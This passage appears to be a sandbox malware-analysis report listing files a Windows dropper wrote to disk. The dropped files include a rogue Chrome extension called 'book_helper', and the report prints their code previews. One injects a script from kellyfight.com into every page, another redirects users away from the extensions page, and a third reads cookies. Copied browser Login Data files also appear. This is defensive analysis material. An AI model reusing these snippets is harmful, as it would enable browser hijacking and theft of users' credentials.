                                                                                                                                                SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):152
                                                                                                                                                Entropy (8bit):5.039480985438208
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.png
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1161
                                                                                                                                                Entropy (8bit):7.79271055262892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.png
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2235
                                                                                                                                                Entropy (8bit):7.880518016071819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):93637
                                                                                                                                                Entropy (8bit):5.292996107428883
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.json
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2380
                                                                                                                                                Entropy (8bit):5.687293760500434
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.html
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):5.048307538221611
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):642
                                                                                                                                                Entropy (8bit):4.985939227199713
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5453
                                                                                                                                                Entropy (8bit):5.1778438140266125
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:nHXbTqqz/X7jgFO4IV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFoon4KsX
                                                                                                                                                MD5:CEA23A1FFBF8271C9A4543A57C4D9684
                                                                                                                                                SHA1:48D0514B8C6917B57BD092731B2C51679E31B005
                                                                                                                                                SHA-256:A1D30920EB823D01DD3BD0FEFD3004C3F70732ECBD73A7C8D443C76473B65E7E
                                                                                                                                                SHA-512:5692C7BB8667B1E6090169DE636E4673752D9312B8A9ED09D66A34A54954B12725F18047F37DFFFD850BF24B3EA56746C6D5E64D4250B9B2D1EDFA9575638FCE
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34636
                                                                                                                                                Entropy (8bit):5.5394367000232565
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:AEpwDvUckPWfr+odLl0b1kXqKf/pUZNCgVLH2HfVrUkGRnJziWC:EDhLwjRnNiv
                                                                                                                                                MD5:0DB0D353C97F12B5A1D82ADCC9F25B9D
                                                                                                                                                SHA1:3D4D71E91E74D8120FE44C170A643FAADA389487
                                                                                                                                                SHA-256:0C1B24F1524174D45410539B2CA583C1637EFECD91AE0C52A4EBFD91B00B2A24
                                                                                                                                                SHA-512:3AB9D9842608401D55EDADB77B4C1EB754E2121D02F9E8561D4FEE2FE776C678CED51AC6702BA1499DD49FBF8861D438D128378F3E2490BEC37A95A66F415549
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                C:\Users\user\AppData\Local\Login Data1611970607033
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Login Data1611970645542
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1611970606876
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37737
                                                                                                                                                Entropy (8bit):7.994967159065528
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1611970639276
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:7-zip archive data, version 0.3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):553040
                                                                                                                                                Entropy (8bit):7.999671101282436
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                                C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4247224
                                                                                                                                                Entropy (8bit):7.867812997543559
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
                                                                                                                                                MD5:63204EB716C856723A010747D58A6B00
                                                                                                                                                SHA1:7E97F00B4C3580CEDEE02C448AC9AEB54AFEFBD2
                                                                                                                                                SHA-256:6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
                                                                                                                                                SHA-512:4B00DC3D824D3526972F74B913CFF2B1D0E12745DE58BFE4BA6196088A17B2346B4EC019BDF923ACC57C77F88AA7B17FA230100C6C35B6672C7A39BFA4953C2E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                Preview: MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V.............................;............@..........................0.......i.............................................. ............... ...............................................................................................text...v........................... ....rdata........... ..................@..@.data....N.......@..................@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe:Zone.Identifier
                                                                                                                                                Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26
                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp
                                                                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
